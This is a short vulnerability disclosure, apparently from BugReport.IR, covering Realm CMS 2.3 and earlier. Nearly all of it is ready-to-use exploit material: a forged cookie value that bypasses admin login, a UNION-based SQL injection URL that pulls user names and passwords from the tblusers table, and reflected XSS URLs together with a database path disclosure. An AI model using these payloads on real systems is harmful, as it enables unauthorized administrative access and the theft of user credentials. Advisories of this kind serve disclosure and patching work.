EXPLOIT : Realm CMS <= 2.3 Multiple Vulnerabilities.

# Original Advisory: http://bugreport.ir/index.php?/40

1. Exploits:
	1.1. Attacker can enter to the admin pages by a manipulated cookie.
		-------------
		-Set these cookies: 
			RealmCmsUser=cUserfiles=userFiles&cIntallType=BugReportTeam&cDbLocat=in&cSiteName=www.Bugreport.IR&cFolder=%2Fcms&cUniqueID=db&cUserRole=1&cUserName=Admin&cUserID=20
		-Then go to:
			/_RealmAdmin/login.asp
		-------------
	1.2. SQL Injection in "inc_routines.asp" in "KeyWordsList" function on "kwrd" parameter.
		-------------
		http://[URL]/cmsr/?job=kwl&kwrd=WWW.BugReport.IR' union select name,password from tblusers where name not like '%WWW.BugReport.IR
		-------------
	1.3. Reflected XSS attack, and DB path disclosure in "/cms/_db/compact.asp"
		-------------
		http://[URL]/cms/_db/compact.asp?CmpctedDB=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E	(Reflected XSS attack)
		http://[URL]/cms/_db/compact.asp?CmpctedDB=1&Boyut=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E	(Reflected XSS attack)
		http://[URL]/cms/_db/compact.asp	(DB path disclosure)
		-------------